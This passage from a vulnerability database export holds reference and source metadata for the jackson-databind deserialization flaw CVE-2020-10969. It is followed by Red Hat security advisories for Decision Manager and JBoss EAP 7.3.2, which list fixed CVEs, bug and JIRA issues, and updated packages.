"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5217"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2333"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform_continuous_delivery/19/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xeap-cd\u0026downloadtype=securitypatches\u0026version\u0019"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1732"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_process_automation_manager/7.8/html/release_notes_for_red_hat_process_automation_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhpam\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10172"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xdata.grid\u0026downloadtype=securitypatches\u0026version=7.3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1745"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10172"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163500"
},
{
"db": "VULMON",
"id": "CVE-2020-10969"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1627"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003491"
},
{
"db": "NVD",
"id": "CVE-2020-10969"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163500",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-10969",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1627",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003491",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-10969",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-03-26T00:00:00",
"db": "VULHUB",
"id": "VHN-163500",
"ident": null
},
{
"date": "2020-03-26T00:00:00",
"db": "VULMON",
"id": "CVE-2020-10969",
"ident": null
},
{
"date": "2020-07-29T17:52:58",
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"date": "2020-05-18T16:42:53",
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"date": "2020-10-27T16:58:42",
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"date": "2020-05-28T16:22:46",
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"date": "2020-07-29T17:53:05",
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"date": "2020-09-17T14:07:40",
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"date": "2020-04-21T14:19:58",
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"date": "2020-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1627",
"ident": null
},
{
"date": "2020-04-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003491",
"ident": null
},
{
"date": "2020-03-26T13:15:13.077000",
"db": "NVD",
"id": "CVE-2020-10969",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-163500",
"ident": null
},
{
"date": "2021-12-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-10969",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1627",
"ident": null
},
{
"date": "2020-04-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003491",
"ident": null
},
{
"date": "2024-11-21T04:56:28.820000",
"db": "NVD",
"id": "CVE-2020-10969",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1627"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "FasterXML jackson-databind Unreliable data deserialization vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003491"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1627"
}
],
"trust": 0.6
}
}
VAR-202003-1779
Vulnerability from variot - Updated: 2026-03-09 21:37FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms). FasterXML jackson-databind There is an unspecified vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x prior to 2.9.10.4 due to insecure deserialization by org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aries.transaction.jms) . A remote attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. Description:
Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business.
It is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.
Security Fix(es):
-
apache-commons-beanutils: does not suppresses the class property in PropertyUtilsBean by default (CVE-2019-10086)
-
cxf: does not restrict the number of message attachments (CVE-2019-12406)
-
cxf: OpenId Connect token service does not properly validate the clientId (CVE-2019-12419)
-
hibernate-validator: safeHTML validator allows XSS (CVE-2019-10219)
-
HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)
-
HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)
-
HTTP/2: flood using SETTINGS frames results in unbounded memory growth (CVE-2019-9515)
-
HTTP/2: large amount of data requests leads to denial of service (CVE-2019-9511)
-
jackson-databind: Multiple serialization gadgets (CVE-2019-17531, CVE-2019-16943, CVE-2019-16942, CVE-2019-17267, CVE-2019-14540, CVE-2019-16335, CVE-2019-14893, CVE-2019-14892, CVE-2020-9546, CVE-2020-9547, CVE-2020-9548, CVE-2020-10969, CVE-2020-10968, CVE-2020-11111, CVE-2020-11112, CVE-2020-11113, CVE-2020-11619, CVE-2020-11620, CVE-2019-20330, CVE-2020-8840)
-
jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10672, CVE-2020-10673)
-
keycloak: adapter endpoints are exposed via arbitrary URLs (CVE-2019-14820)
-
keycloak: missing signatures validation on CRL used to verify client certificates (CVE-2019-3875)
-
keycloak: SAML broker does not check existence of signature on document allowing any user impersonation (CVE-2019-10201)
-
keycloak: CSRF check missing in My Resources functionality in the Account Console (CVE-2019-10199)
-
keycloak: cross-realm user access auth bypass (CVE-2019-14832)
-
netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling (CVE-2020-7238)
-
SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader (CVE-2020-1729)
-
thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol (CVE-2019-0210)
-
thrift: Endless loop when feed with specific input data (CVE-2019-0205)
-
undertow: possible Denial Of Service (DOS) in Undertow HTTP server listening on HTTPS (CVE-2019-14888)
-
wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use (CVE-2019-14887)
-
wildfly-core: Incorrect privileges for 'Monitor', 'Auditor' and 'Deployer' user by default (CVE-2019-14838)
-
xml-security: Apache Santuario potentially loads XML parsing code from an untrusted source (CVE-2019-12400)
For more details about the security issues and their impact, the CVSS score, acknowledgements, and other related information, see the CVE pages listed in the References section.
The References section of this erratum contains a download link for the update. You must be logged in to download the update. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update Advisory ID: RHSA-2020:3461-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://access.redhat.com/errata/RHSA-2020:3461 Issue date: 2020-08-17 CVE Names: CVE-2019-14900 CVE-2020-1710 CVE-2020-1748 CVE-2020-10672 CVE-2020-10673 CVE-2020-10683 CVE-2020-10687 CVE-2020-10693 CVE-2020-10714 CVE-2020-10718 CVE-2020-10740 CVE-2020-14297 =====================================================================
- Summary:
An update is now available for Red Hat JBoss Enterprise Application Platform 7.3 for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss EAP 7.3 for RHEL 6 Server - noarch
- Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.3.2 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.3.1, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.3.2 Release Notes for information about the most significant bug fixes and enhancements included in this release.
Security Fix(es):
-
wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API (CVE-2020-10718)
-
dom4j: XML External Entity vulnerability in default SAX parser (CVE-2020-10683)
-
wildfly-elytron: session fixation when using FORM authentication (CVE-2020-10714)
-
wildfly-undertow: Undertow: Incomplete fix for CVE-2017-2666 due to permitting invalid characters in HTTP requests (CVE-2020-10687)
-
jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10673)
-
hibernate-core: hibernate: SQL injection issue in Hibernate ORM (CVE-2019-14900)
-
wildfly: unsafe deserialization in Wildfly Enterprise Java Beans (CVE-2020-10740)
-
jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10672)
-
undertow: EAP: field-name is not parsed in accordance to RFC7230 (CVE-2020-1710)
-
hibernate-validator: Improper input validation in the interpolation of constraint error messages (CVE-2020-10693)
-
wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain (CVE-2020-1748)
-
wildfly: Some EJB transaction objects may get accumulated causing Denial of Service (CVE-2020-14297)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, see the CVE page(s) listed in the References section.
- Solution:
Before applying this update, ensure all previously released errata relevant to your system have been applied.
For details about how to apply this update, see:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1666499 - CVE-2019-14900 hibernate: SQL injection issue in Hibernate ORM 1694235 - CVE-2020-10683 dom4j: XML External Entity vulnerability in default SAX parser 1785049 - CVE-2020-10687 Undertow: Incomplete fix for CVE-2017-2666 due to permitting invalid characters in HTTP requests 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1828476 - CVE-2020-10718 wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API 1834512 - CVE-2020-10740 wildfly: unsafe deserialization in Wildfly Enterprise Java Beans 1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-18793 - GSS Upgrade Hibernate ORM from 5.3.16 to 5.3.17 JBEAP-19095 - GSS Upgrade wildfly-http-client from 1.0.20 to 1.0.21 JBEAP-19134 - (7.3.z) Upgrade HAL from 3.2.8.Final-redhat-00001 to 3.2.9.Final JBEAP-19185 - (7.3.z) Upgrade IronJacamar from 1.4.20.Final to 1.4.22.Final JBEAP-19203 - (7.3.z) WFCORE-4850 - Updating mockserver to 5.9.0. Exclusion of dependency from xom.io7m JBEAP-19205 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.x JBEAP-19269 - GSS Upgrade jboss-logmanager from 2.1.14.Final to 2.1.15.Final JBEAP-19322 - (7.3.z) Upgrade XNIO from 3.7.7 to 3.7.8.SP1 JBEAP-19325 - (7.3.z) Upgrade Infinispan from 9.4.18.Final-redhat-00001 to 9.4.19.Final-redhat-00001 JBEAP-19397 - (7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP09-redhat-00001 to 2.3.9.SP11-redhat-00001 JBEAP-19409 - Tracker bug for the EAP 7.3.2 release for RHEL-6 JBEAP-19529 - (7.3.z) Update PR template to include PR-processor hints. JBEAP-19564 - GSS Upgrade jboss-ejb-client from 4.0.31.Final-redhat-00001 to 4.0.33.Final-redhat-00001 JBEAP-19585 - GSS Upgrade org.jboss.genericjms from 2.0.4 to 2.0.6 JBEAP-19617 - (7.3.z) Upgrade wildfly-naming-client from 1.0.12.Final-redhat-00001 to 1.0.13.Final-redhat-00001 JBEAP-19619 - (7.3.z) Upgrade JBoss JSF API from 3.0.0.SP02-redhat-00001 to 3.0.0.SP04-redhat-00001 JBEAP-19673 - (7.3.z) [WFCORE] Upgrade WildFly Common to 1.5.2.Final JBEAP-19674 - (7.3.z) [WFCORE] Upgrade galleon and wildfly-galleon-plugins from 4.1.2.Final to 4.2.4.Final JBEAP-19874 - GSS Upgrade wildfly-http-client from 1.0.21.Final-redhat-00001 to 1.0.22.Final-redhat-00001
- Package List:
Red Hat JBoss EAP 7.3 for RHEL 6 Server:
Source: eap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.src.rpm eap7-elytron-web-1.6.2-1.Final_redhat_00001.1.el6eap.src.rpm eap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.src.rpm eap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.src.rpm eap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.src.rpm eap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.src.rpm eap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.src.rpm eap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.src.rpm eap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-jaxrs-providers-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.src.rpm eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.src.rpm eap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.src.rpm eap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.src.rpm eap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.src.rpm eap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.src.rpm eap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.src.rpm eap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.src.rpm eap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.src.rpm eap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.src.rpm eap7-wildfly-http-client-1.0.22-1.Final_redhat_00001.1.el6eap.src.rpm
noarch: eap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.noarch.rpm eap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.noarch.rpm eap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-core-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-entitymanager-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-envers-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-java8-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-validator-cdi-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-cachestore-jdbc-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-cachestore-remote-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-client-hotrod-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-core-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-hibernate-cache-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-hibernate-cache-spi-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-hibernate-cache-v53-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-common-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-common-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-common-spi-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-core-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-core-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-deployers-common-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-jdbc-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-validator-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-datatype-jdk8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-datatype-jsr310-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-jaxrs-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-jaxrs-json-provider-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-module-jaxb-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.noarch.rpm eap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-cli-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-core-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap6.4-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap6.4-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.2-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.3-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly10.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly10.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly11.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly12.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly13.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly14.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly15.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly16.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly17.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly18.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly8.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly9.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.noarch.rpm eap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-netty-all-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.noarch.rpm eap7-undertow-server-1.6.2-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm eap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.noarch.rpm eap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-elytron-tool-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-client-common-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-ejb-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-naming-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-transaction-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-javadocs-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm eap7-wildfly-modules-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-14900 https://access.redhat.com/security/cve/CVE-2020-1710 https://access.redhat.com/security/cve/CVE-2020-1748 https://access.redhat.com/security/cve/CVE-2020-10672 https://access.redhat.com/security/cve/CVE-2020-10673 https://access.redhat.com/security/cve/CVE-2020-10683 https://access.redhat.com/security/cve/CVE-2020-10687 https://access.redhat.com/security/cve/CVE-2020-10693 https://access.redhat.com/security/cve/CVE-2020-10714 https://access.redhat.com/security/cve/CVE-2020-10718 https://access.redhat.com/security/cve/CVE-2020-10740 https://access.redhat.com/security/cve/CVE-2020-14297 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/ https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
